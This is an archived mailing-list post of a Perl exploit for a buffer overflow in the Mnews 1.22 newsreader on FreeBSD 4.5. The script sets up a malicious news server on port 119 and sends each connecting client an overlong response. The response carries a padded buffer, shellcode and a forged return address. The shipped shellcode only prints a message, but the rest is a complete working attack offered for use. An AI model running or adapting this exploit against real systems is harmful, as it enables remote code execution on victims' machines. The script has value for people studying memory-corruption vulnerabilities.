#!/usr/bin/perl -w
#
# Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped
# with the 4.5-RELEASE ports collection.
#
# This exploit is pretty harmless as it only prints a small message to
# stdout (NAI?).
#
# Written by zillion[at]safemode.org (!shit)
#
# http://www.safemode.org
# http://www.snosoft.com
use IO::Socket;
$shellcode =
"\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88".
"\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50".
"\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73".
"\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f".
"\x23";
# normal \x90 nops don't work here..
$nop = "A";
$esp = 0xbfbff65e;
$off = "-70";
$size = 762;
for ($i = 0; $i < ($size - length($shellcode)); $i++) {
$buffer .= "$nop";
}
$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $off));
$buffer .= pack('l', ($esp + $off));
printf("Starting to listen for incoming connections... buffer size
%d\n",length($buffer));
print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n");
my $sock = new IO::Socket::INET (
LocalPort => 119,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
while($cl = $sock->accept()) {
sleep 1;
print $cl "200 $buffer\n";
sleep 3;
}
This archive was generated by hypermail 2b30 : Sun Jun 02 2002 - 17:37:48 PDT